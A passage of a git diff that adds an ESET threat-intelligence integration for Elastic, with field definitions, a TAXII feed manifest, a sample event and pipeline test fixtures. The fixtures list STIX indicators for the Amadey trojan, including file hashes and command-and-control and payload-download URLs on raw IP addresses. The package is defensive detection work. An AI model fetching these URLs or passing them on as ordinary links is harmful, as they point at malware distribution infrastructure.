threat.indicator.url.port +- external: ecs + name: threat.indicator.url.scheme +- external: ecs + name: threat.indicator.x509.issuer.common_name +- external: ecs + name: threat.indicator.x509.issuer.country +- external: ecs + name: threat.indicator.x509.issuer.distinguished_name +- external: ecs + name: threat.indicator.x509.issuer.locality +- external: ecs + name: threat.indicator.x509.issuer.organization +- external: ecs + name: threat.indicator.x509.issuer.state_or_province +- external: ecs + name: threat.indicator.x509.issuer.organizational_unit +- external: ecs + name: threat.indicator.x509.not_after +- external: ecs + name: threat.indicator.x509.not_before +- external: ecs + name: threat.indicator.x509.serial_number +- external: ecs + name: 
threat.indicator.x509.signature_algorithm +- external: ecs + name: threat.indicator.x509.subject.common_name +- external: ecs + name: threat.indicator.x509.subject.country +- external: ecs + name: threat.indicator.x509.subject.distinguished_name +- external: ecs + name: threat.indicator.x509.subject.locality +- external: ecs + name: threat.indicator.x509.subject.organization +- external: ecs + name: threat.indicator.x509.subject.state_or_province +- external: ecs + name: threat.indicator.x509.subject.organizational_unit +- external: ecs + name: threat.indicator.x509.version_number diff --git a/packages/ti_eset/data_stream/apt/fields/fields.yml b/packages/ti_eset/data_stream/apt/fields/fields.yml new file mode 100644 index 00000000000..171e23fd814 --- /dev/null +++ b/packages/ti_eset/data_stream/apt/fields/fields.yml @@ -0,0 +1,37 @@ +- name: eset + type: group + description: > + Fields for ESET Threat Intelligence + + fields: + - name: id + type: keyword + description: The UID of the event object. + - name: category + type: keyword + description: > + Event category as defined by MISP. + + - name: meta_category + type: keyword + description: > + Event sub-category as defined by MISP. + + - name: name + type: keyword + description: > + Human readable name describing the event. + + - name: type + type: keyword + description: > + Type of the event. + + - name: valid_until + type: date + description: >- + Event expiration date. +- name: labels.is_ioc_transform_source + type: constant_keyword + value: 'true' + description: Field indicating if its the transform source for supporting IOC expiration. This field is dropped from destination indices to facilitate easier filtering of indicators. diff --git a/packages/ti_eset/data_stream/apt/lifecycle.yml b/packages/ti_eset/data_stream/apt/lifecycle.yml new file mode 100644 index 00000000000..7bd2145f9d8 --- /dev/null +++ b/packages/ti_eset/data_stream/apt/lifecycle.yml @@ -0,0 +1 @@ +data_retention: 365d 
diff --git a/packages/ti_eset/data_stream/apt/manifest.yml b/packages/ti_eset/data_stream/apt/manifest.yml
new file mode 100644
index 00000000000..6396af9d0e7
--- /dev/null
+++ b/packages/ti_eset/data_stream/apt/manifest.yml
@@ -0,0 +1,95 @@
+title: "APT"
+type: logs
+ilm_policy: logs-ti_eset.apt-default_policy
+streams:
+ - input: httpjson
+ title: APT
+ description: Collect data from ETI APT feed
+ template_path: httpjson.yml.hbs
+ vars:
+ - name: url
+ description: URL with API root and identifier of APT collection as described by [TAXII v2.1 standard](https://docs.oasis-open.org/cti/taxii/v2.1/os/taxii-v2.1-os.html#_Toc31107514)
+ type: text
+ title: Collection URL
+ multi: false
+ required: true
+ show_user: true
+ default: https://taxii.eset.com/taxii2/643f4eb5-f8b7-46a3-a606-6d61d5ce223a/collections/97e3eb74ae5f46dd9e22f677a6938ee7/objects/
+ - name: enable_request_tracer
+ type: bool
+ title: Enable request tracing
+ multi: false
+ required: false
+ show_user: false
+ description: The request tracer logs requests and responses to the agent's local file-system for debugging configurations. Enabling this request tracing compromises security and should only be used for debugging. See [documentation](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-input-httpjson.html#_request_tracer_filename) for details.
+ - name: http_client_timeout
+ type: text
+ title: HTTP Client Timeout
+ description: Duration before declaring that the HTTP client connection has timed out. Valid time units are ns, us, ms, s, m, h.
+ multi: false
+ required: false
+ show_user: false
+ default: 1m
+ - name: proxy_url
+ type: text
+ title: Proxy URL
+ multi: false
+ required: false
+ show_user: false
+ description: URL to proxy connections in the form of http\[s\]://:@:
+ - name: interval
+ type: text
+ title: Interval
+ description: Interval at which the logs will be pulled. Supported units for this parameter are h/m/s.
+ multi: false
+ required: true
+ show_user: true
+ default: 1h
+ - name: initial_interval
+ type: text
+ title: Initial Interval
+ multi: false
+ required: true
+ show_user: false
+ default: 48h
+ description: How far back to look for indicators the first time the agent is started. Supported units for this parameter are h/m/s.
+ - name: page_size
+ type: integer
+ multi: false
+ required: false
+ default: "1000"
+ show_user: false
+ title: Page size
+ description: Maximum number of records to pull in one request.
+ - name: ssl
+ type: yaml
+ title: SSL
+ multi: false
+ required: false
+ show_user: false
+ - name: tags
+ type: text
+ title: Tags
+ multi: true
+ required: true
+ show_user: false
+ default:
+ - forwarded
+ - eset-apt
+ - name: preserve_original_event
+ required: true
+ show_user: true
+ title: Preserve original event
+ description: Preserves a raw copy of the original event, added to the field `event.original`
+ type: bool
+ multi: false
+ default: false
+ - name: processors
+ type: yaml
+ title: Processors
+ multi: false
+ required: false
+ show_user: false
+ description: >
+ Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details.
+
diff --git a/packages/ti_eset/data_stream/apt/sample_event.json b/packages/ti_eset/data_stream/apt/sample_event.json
new file mode 100644
index 00000000000..fb1a68be57d
--- /dev/null
+++ b/packages/ti_eset/data_stream/apt/sample_event.json
@@ -0,0 +1,71 @@ +{ + "@timestamp": "2023-09-29T08:48:42.000Z", + "agent": { + "ephemeral_id": "aca3c3ca-0233-4da9-aa4d-67883702e60b", + "id": "9e0f3400-1e85-4042-80cf-3bb8e2ffb404", + "name": "docker-fleet-agent", + "type": "filebeat", + "version": "8.12.1" + }, + "data_stream": { + "dataset": "ti_eset.apt", + "namespace": "ep", + "type": "logs" + }, + "ecs": { + "version": "8.11.0" + }, + "elastic_agent": { + "id": "9e0f3400-1e85-4042-80cf-3bb8e2ffb404", + "snapshot": false, + "version": "8.12.1" + }, + "eset": { + "id": "indicator--a4cb9aa8-b12e-4141-ae33-509dfd9dd382", + "meta_category": "file", + "name": "file", + "valid_until": "2024-09-28T08:48:42.000Z" + }, + "event": { + "agent_id_status": "verified", + "category": [ + "threat" + ], + "created": "2024-03-27T14:17:00.528Z", + "dataset": "ti_eset.apt", + "ingested": "2024-03-27T14:17:10Z", + "kind": "enrichment", + "original": "{\"created\":\"2023-09-29T08:48:42.000Z\",\"created_by_ref\":\"identity--55f6ea5e-51ac-4344-bc8c-4170950d210f\",\"id\":\"indicator--a4cb9aa8-b12e-4141-ae33-509dfd9dd382\",\"kill_chain_phases\":[{\"kill_chain_name\":\"misp-category\",\"phase_name\":\"file\"}],\"labels\":[\"misp:name=\\\"file\\\"\",\"misp:meta-category=\\\"file\\\"\",\"misp:to_ids=\\\"True\\\"\"],\"modified\":\"2023-09-29T08:48:42.000Z\",\"pattern\":\"[file:hashes.MD5 = '7196b26572d2c357a17599b9a0d71d33' AND file:hashes.SHA1 = 'a3ee3d4bc8057cfde073a7acf3232cfb3cbb10c0' AND file:hashes.SHA256 = '6c9eab41d2e06702313ee6513a8b98adc083ee7bcd2c85821a8a3136c20d687e' AND file:name = 'KihqQGHs7zYOxqqNE0b9zO4w6d7ysXUWrfDf6vLOAW4MU3Fs.mp3' AND file:parent_directory_ref.path = 'Comchit ltr no 4200 dt 23-09-2023' AND file:x_misp_fullpath = 'Comchit ltr no 4200 dt 23-09-2023/KihqQGHs7zYOxqqNE0b9zO4w6d7ysXUWrfDf6vLOAW4MU3Fs.mp3' AND file:extensions.'windows-pebinary-ext'.imphash = 'fcab131627362db5898b1bcc15d7fd72' AND file:extensions.'windows-pebinary-ext'.pe_type = 'dll' AND 
file:extensions.'windows-pebinary-ext'.x_misp_compilation_timestamp = '2023-09-25 07:03:56+00:00' AND file:extensions.'windows-pebinary-ext'.x_misp_authentihash = '6c744b262dbf76fb20346a93cbedbb0668c90b5bb5027485109e3cfb41f48d8c']\",\"pattern_type\":\"stix\",\"pattern_version\":\"2.1\",\"spec_version\":\"indicator\",\"type\":\"indicator\",\"valid_from\":\"2023-09-26T07:00:04Z\"}", + "type": [ + "indicator" + ] + }, + "input": { + "type": "httpjson" + }, + "tags": [ + "preserve_original_event", + "forwarded", + "eset-apt" + ], + "threat": { + "feed": { + "name": "ESET APT stix 2.1" + }, + "indicator": { + "confidence": "High", + "file": { + "hash": { + "md5": "7196b26572d2c357a17599b9a0d71d33", + "sha1": "a3ee3d4bc8057cfde073a7acf3232cfb3cbb10c0", + "sha256": "6c9eab41d2e06702313ee6513a8b98adc083ee7bcd2c85821a8a3136c20d687e" + }, + "name": "KihqQGHs7zYOxqqNE0b9zO4w6d7ysXUWrfDf6vLOAW4MU3Fs.mp3" + }, + "last_seen": "2023-09-29T08:48:42.000Z", + "modified_at": "2023-09-29T08:48:42.000Z", + "provider": "eset", + "type": "file" + } + } +} \ No newline at end of file diff --git a/packages/ti_eset/data_stream/botnet/_dev/test/pipeline/test-common-config.yml b/packages/ti_eset/data_stream/botnet/_dev/test/pipeline/test-common-config.yml new file mode 100644 index 00000000000..4da22641654 --- /dev/null +++ b/packages/ti_eset/data_stream/botnet/_dev/test/pipeline/test-common-config.yml @@ -0,0 +1,3 @@ +fields: + tags: + - preserve_original_event diff --git a/packages/ti_eset/data_stream/botnet/_dev/test/pipeline/test-eset-ndjson.log b/packages/ti_eset/data_stream/botnet/_dev/test/pipeline/test-eset-ndjson.log new file mode 100644 index 00000000000..438a8b68c98 --- /dev/null +++ b/packages/ti_eset/data_stream/botnet/_dev/test/pipeline/test-eset-ndjson.log 
@@ -0,0 +1,10 @@ +{"id": "indicator--cff76e38-b2f0-4777-88a0-758ad0dce832", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T02:00:03.000Z", "modified": "2023-10-15T02:00:03.000Z", "name": "373d34874d7bc89fd4cefa6272ee80bf", "description": "Each of these file hashes indicates that a variant of Win32/TrojanDownloader.Amadey.A trojan is present.", "pattern": "[file:hashes.'SHA-256'='d3444b38c6e1224665a86a71d686355c98c6f62e2ee6a55ca12f2dcb87bb8f4e'] OR [file:hashes.'SHA-1'='cc2b68a6e60896d8d87f54a97f129ac1c24b25c1'] OR [file:hashes.'MD5'='aadae3d8fe65ac7cfc2c782293e6c60c']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T02:00:03Z", "valid_until": "2023-10-17T02:00:03Z", "labels": ["malicious-activity"]} +{"id": "indicator--4db7b816-e2d4-4efb-8780-939f1378873c", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T02:00:03.000Z", "modified": "2023-10-15T02:00:03.000Z", "name": "example.com", "description": "C&C indicates that a botnet Win32/TrojanDownloader.Amadey.A trojan is present.", "pattern": "[url:value = 'http://77.91.124.1/theme/index.php']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T02:00:03Z", "valid_until": "2023-10-17T02:00:03Z", "labels": ["malicious-activity"]} +{"id": "indicator--7608f5a5-f6cb-4d1c-bd4b-05f195d20ce9", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T02:00:03.000Z", "modified": "2023-10-15T02:00:03.000Z", "name": "example.com", "description": "C&C indicates that a botnet Win32/TrojanDownloader.Amadey.A trojan is present.", "pattern": "[url:value = 'http://77.91.68.52/fuza/sus.exe']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T02:00:03Z", "valid_until": "2023-10-17T02:00:03Z", "labels": ["malicious-activity"]} +{"id": "indicator--34730a14-9027-416b-af6c-50a425fd4b05", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T02:00:03.000Z", "modified": 
"2023-10-15T02:00:03.000Z", "name": "example.com", "description": "C&C indicates that a botnet Win32/TrojanDownloader.Amadey.A trojan is present.", "pattern": "[url:value = 'http://77.91.68.52/fuza/foto3553.exe']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T02:00:03Z", "valid_until": "2023-10-17T02:00:03Z", "labels": ["malicious-activity"]} +{"id": "indicator--302bb8b1-bd56-46f4-a5ec-fc57eabec6e3", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T02:00:03.000Z", "modified": "2023-10-15T02:00:03.000Z", "name": "example.com", "description": "C&C indicates that a botnet Win32/TrojanDownloader.Amadey.A trojan is present.", "pattern": "[url:value = 'http://77.91.68.52/fuza/nalo.exe']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T02:00:03Z", "valid_until": "2023-10-17T02:00:03Z", "labels": ["malicious-activity"]} +{"id": "indicator--f90799cf-307e-43d4-9716-afb24d3ce10a", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T02:00:03.000Z", "modified": "2023-10-15T02:00:03.000Z", "name": "example.com", "description": "C&C indicates that a botnet Win32/TrojanDownloader.Amadey.A trojan is present.", "pattern": "[url:value = 'http://77.91.124.1/theme/Plugins/clip64.dll']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T02:00:03Z", "valid_until": "2023-10-17T02:00:03Z", "labels": ["malicious-activity"]} +{"id": "indicator--8a199d9a-f5dc-4cd9-88c1-6ed637e07eb7", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T02:00:03.000Z", "modified": "2023-10-15T02:00:03.000Z", "name": "example.com", "description": "C&C indicates that a botnet Win32/TrojanDownloader.Amadey.A trojan is present.", "pattern": "[url:value = 'http://77.91.124.1/theme/Plugins']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T02:00:03Z", "valid_until": "2023-10-17T02:00:03Z", "labels": ["malicious-activity"]} +{"id": 
"indicator--e8bdd70f-789d-4666-8389-8cc311ab5355", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T02:00:03.000Z", "modified": "2023-10-15T02:00:03.000Z", "name": "example.com", "description": "C&C indicates that a botnet Win32/TrojanDownloader.Amadey.A trojan is present.", "pattern": "[url:value = 'http://77.91.68.52/fuza']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T02:00:03Z", "valid_until": "2023-10-17T02:00:03Z", "labels": ["malicious-activity"]} +{"id": "indicator--f3880694-81c9-487e-b32f-7409b30c78e4", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T02:10:07.000Z", "modified": "2023-10-15T02:10:07.000Z", "name": "373d34874d7bc89fd4cefa6272ee80bf", "description": "Each of these file hashes indicates that a variant of Win32/TrojanDownloader.Amadey.A trojan is present.", "pattern": "[file:hashes.'SHA-256'='d655a0410186269feccdf8ba3bd1eb0cdb066a45fc92cb4ce2dc8cd80a05c552'] OR [file:hashes.'SHA-1'='b1dee45e96433e0a73e3b3d39dde3a7779ff3183'] OR [file:hashes.'MD5'='7f160411fd74b895ad7b89388a441bb5']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T02:10:07Z", "valid_until": "2023-10-17T02:10:07Z", "labels": ["malicious-activity"]} +{"id": "indicator--b48a316c-8068-4a0a-b657-eea457ae21ef", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T02:10:07.000Z", "modified": "2023-10-15T02:10:07.000Z", "name": "example.com", "description": "C&C indicates that a botnet Win32/TrojanDownloader.Amadey.A trojan is present.", "pattern": "[url:value = 'http://5.42.65.80/8bmeVwqx/index.php']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T02:10:07Z", "valid_until": "2023-10-17T02:10:07Z", "labels": ["malicious-activity"]} \ No newline at end of file 
diff --git a/packages/ti_eset/data_stream/botnet/_dev/test/pipeline/test-eset-ndjson.log-expected.json b/packages/ti_eset/data_stream/botnet/_dev/test/pipeline/test-eset-ndjson.log-expected.json new file mode 100644 index 00000000000..7688d4b6225 --- /dev/null +++ b/packages/ti_eset/data_stream/botnet/_dev/test/pipeline/test-eset-ndjson.log-expected.json 
@@ -0,0 +1,442 @@ +{ + "expected": [ + { + "@timestamp": "2023-10-15T02:00:03.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--cff76e38-b2f0-4777-88a0-758ad0dce832", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-17T02:00:03.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--cff76e38-b2f0-4777-88a0-758ad0dce832\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T02:00:03.000Z\", \"modified\": \"2023-10-15T02:00:03.000Z\", \"name\": \"373d34874d7bc89fd4cefa6272ee80bf\", \"description\": \"Each of these file hashes indicates that a variant of Win32/TrojanDownloader.Amadey.A trojan is present.\", \"pattern\": \"[file:hashes.'SHA-256'='d3444b38c6e1224665a86a71d686355c98c6f62e2ee6a55ca12f2dcb87bb8f4e'] OR [file:hashes.'SHA-1'='cc2b68a6e60896d8d87f54a97f129ac1c24b25c1'] OR [file:hashes.'MD5'='aadae3d8fe65ac7cfc2c782293e6c60c']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T02:00:03Z\", \"valid_until\": \"2023-10-17T02:00:03Z\", \"labels\": [\"malicious-activity\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET Botnet stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "Each of these file hashes indicates that a variant of Win32/TrojanDownloader.Amadey.A trojan is present.", + "file": { + "hash": { + "md5": "aadae3d8fe65ac7cfc2c782293e6c60c", + "sha1": "cc2b68a6e60896d8d87f54a97f129ac1c24b25c1", + "sha256": "d3444b38c6e1224665a86a71d686355c98c6f62e2ee6a55ca12f2dcb87bb8f4e" + } + }, + "last_seen": "2023-10-15T02:00:03.000Z", + "modified_at": "2023-10-15T02:00:03.000Z", + "name": "373d34874d7bc89fd4cefa6272ee80bf", + "provider": "eset", + "type": "file" + } + } + }, + { + "@timestamp": "2023-10-15T02:00:03.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": 
"indicator--4db7b816-e2d4-4efb-8780-939f1378873c", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-17T02:00:03.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--4db7b816-e2d4-4efb-8780-939f1378873c\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T02:00:03.000Z\", \"modified\": \"2023-10-15T02:00:03.000Z\", \"name\": \"example.com\", \"description\": \"C&C indicates that a botnet Win32/TrojanDownloader.Amadey.A trojan is present.\", \"pattern\": \"[url:value = 'http://77.91.124.1/theme/index.php']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T02:00:03Z\", \"valid_until\": \"2023-10-17T02:00:03Z\", \"labels\": [\"malicious-activity\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET Botnet stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "C&C indicates that a botnet Win32/TrojanDownloader.Amadey.A trojan is present.", + "last_seen": "2023-10-15T02:00:03.000Z", + "modified_at": "2023-10-15T02:00:03.000Z", + "name": "example.com", + "provider": "eset", + "type": "url", + "url": { + "original": "http://77.91.124.1/theme/index.php" + } + } + } + }, + { + "@timestamp": "2023-10-15T02:00:03.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--7608f5a5-f6cb-4d1c-bd4b-05f195d20ce9", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-17T02:00:03.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--7608f5a5-f6cb-4d1c-bd4b-05f195d20ce9\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T02:00:03.000Z\", \"modified\": \"2023-10-15T02:00:03.000Z\", \"name\": \"example.com\", \"description\": \"C&C indicates that a botnet Win32/TrojanDownloader.Amadey.A trojan is present.\", 
\"pattern\": \"[url:value = 'http://77.91.68.52/fuza/sus.exe']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T02:00:03Z\", \"valid_until\": \"2023-10-17T02:00:03Z\", \"labels\": [\"malicious-activity\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET Botnet stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "C&C indicates that a botnet Win32/TrojanDownloader.Amadey.A trojan is present.", + "last_seen": "2023-10-15T02:00:03.000Z", + "modified_at": "2023-10-15T02:00:03.000Z", + "name": "example.com", + "provider": "eset", + "type": "url", + "url": { + "original": "http://77.91.68.52/fuza/sus.exe" + } + } + } + }, + { + "@timestamp": "2023-10-15T02:00:03.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--34730a14-9027-416b-af6c-50a425fd4b05", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-17T02:00:03.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--34730a14-9027-416b-af6c-50a425fd4b05\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T02:00:03.000Z\", \"modified\": \"2023-10-15T02:00:03.000Z\", \"name\": \"example.com\", \"description\": \"C&C indicates that a botnet Win32/TrojanDownloader.Amadey.A trojan is present.\", \"pattern\": \"[url:value = 'http://77.91.68.52/fuza/foto3553.exe']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T02:00:03Z\", \"valid_until\": \"2023-10-17T02:00:03Z\", \"labels\": [\"malicious-activity\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET Botnet stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "C&C indicates that a botnet Win32/TrojanDownloader.Amadey.A trojan is present.", + "last_seen": 
"2023-10-15T02:00:03.000Z", + "modified_at": "2023-10-15T02:00:03.000Z", + "name": "example.com", + "provider": "eset", + "type": "url", + "url": { + "original": "http://77.91.68.52/fuza/foto3553.exe" + } + } + } + }, + { + "@timestamp": "2023-10-15T02:00:03.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--302bb8b1-bd56-46f4-a5ec-fc57eabec6e3", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-17T02:00:03.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--302bb8b1-bd56-46f4-a5ec-fc57eabec6e3\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T02:00:03.000Z\", \"modified\": \"2023-10-15T02:00:03.000Z\", \"name\": \"example.com\", \"description\": \"C&C indicates that a botnet Win32/TrojanDownloader.Amadey.A trojan is present.\", \"pattern\": \"[url:value = 'http://77.91.68.52/fuza/nalo.exe']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T02:00:03Z\", \"valid_until\": \"2023-10-17T02:00:03Z\", \"labels\": [\"malicious-activity\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET Botnet stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "C&C indicates that a botnet Win32/TrojanDownloader.Amadey.A trojan is present.", + "last_seen": "2023-10-15T02:00:03.000Z", + "modified_at": "2023-10-15T02:00:03.000Z", + "name": "example.com", + "provider": "eset", + "type": "url", + "url": { + "original": "http://77.91.68.52/fuza/nalo.exe" + } + } + } + }, + { + "@timestamp": "2023-10-15T02:00:03.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--f90799cf-307e-43d4-9716-afb24d3ce10a", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-17T02:00:03.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": 
\"indicator--f90799cf-307e-43d4-9716-afb24d3ce10a\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T02:00:03.000Z\", \"modified\": \"2023-10-15T02:00:03.000Z\", \"name\": \"example.com\", \"description\": \"C&C indicates that a botnet Win32/TrojanDownloader.Amadey.A trojan is present.\", \"pattern\": \"[url:value = 'http://77.91.124.1/theme/Plugins/clip64.dll']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T02:00:03Z\", \"valid_until\": \"2023-10-17T02:00:03Z\", \"labels\": [\"malicious-activity\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET Botnet stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "C&C indicates that a botnet Win32/TrojanDownloader.Amadey.A trojan is present.", + "last_seen": "2023-10-15T02:00:03.000Z", + "modified_at": "2023-10-15T02:00:03.000Z", + "name": "example.com", + "provider": "eset", + "type": "url", + "url": { + "original": "http://77.91.124.1/theme/Plugins/clip64.dll" + } + } + } + }, + { + "@timestamp": "2023-10-15T02:00:03.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--8a199d9a-f5dc-4cd9-88c1-6ed637e07eb7", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-17T02:00:03.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--8a199d9a-f5dc-4cd9-88c1-6ed637e07eb7\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T02:00:03.000Z\", \"modified\": \"2023-10-15T02:00:03.000Z\", \"name\": \"example.com\", \"description\": \"C&C indicates that a botnet Win32/TrojanDownloader.Amadey.A trojan is present.\", \"pattern\": \"[url:value = 'http://77.91.124.1/theme/Plugins']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T02:00:03Z\", \"valid_until\": \"2023-10-17T02:00:03Z\", \"labels\": 
[\"malicious-activity\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET Botnet stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "C&C indicates that a botnet Win32/TrojanDownloader.Amadey.A trojan is present.", + "last_seen": "2023-10-15T02:00:03.000Z", + "modified_at": "2023-10-15T02:00:03.000Z", + "name": "example.com", + "provider": "eset", + "type": "url", + "url": { + "original": "http://77.91.124.1/theme/Plugins" + } + } + } + }, + { + "@timestamp": "2023-10-15T02:00:03.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--e8bdd70f-789d-4666-8389-8cc311ab5355", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-17T02:00:03.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--e8bdd70f-789d-4666-8389-8cc311ab5355\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T02:00:03.000Z\", \"modified\": \"2023-10-15T02:00:03.000Z\", \"name\": \"example.com\", \"description\": \"C&C indicates that a botnet Win32/TrojanDownloader.Amadey.A trojan is present.\", \"pattern\": \"[url:value = 'http://77.91.68.52/fuza']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T02:00:03Z\", \"valid_until\": \"2023-10-17T02:00:03Z\", \"labels\": [\"malicious-activity\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET Botnet stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "C&C indicates that a botnet Win32/TrojanDownloader.Amadey.A trojan is present.", + "last_seen": "2023-10-15T02:00:03.000Z", + "modified_at": "2023-10-15T02:00:03.000Z", + "name": "example.com", + "provider": "eset", + "type": "url", + "url": { + "original": "http://77.91.68.52/fuza" + } + } + } + }, + { + "@timestamp": 
"2023-10-15T02:10:07.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--f3880694-81c9-487e-b32f-7409b30c78e4", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-17T02:10:07.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--f3880694-81c9-487e-b32f-7409b30c78e4\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T02:10:07.000Z\", \"modified\": \"2023-10-15T02:10:07.000Z\", \"name\": \"373d34874d7bc89fd4cefa6272ee80bf\", \"description\": \"Each of these file hashes indicates that a variant of Win32/TrojanDownloader.Amadey.A trojan is present.\", \"pattern\": \"[file:hashes.'SHA-256'='d655a0410186269feccdf8ba3bd1eb0cdb066a45fc92cb4ce2dc8cd80a05c552'] OR [file:hashes.'SHA-1'='b1dee45e96433e0a73e3b3d39dde3a7779ff3183'] OR [file:hashes.'MD5'='7f160411fd74b895ad7b89388a441bb5']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T02:10:07Z\", \"valid_until\": \"2023-10-17T02:10:07Z\", \"labels\": [\"malicious-activity\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET Botnet stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "Each of these file hashes indicates that a variant of Win32/TrojanDownloader.Amadey.A trojan is present.", + "file": { + "hash": { + "md5": "7f160411fd74b895ad7b89388a441bb5", + "sha1": "b1dee45e96433e0a73e3b3d39dde3a7779ff3183", + "sha256": "d655a0410186269feccdf8ba3bd1eb0cdb066a45fc92cb4ce2dc8cd80a05c552" + } + }, + "last_seen": "2023-10-15T02:10:07.000Z", + "modified_at": "2023-10-15T02:10:07.000Z", + 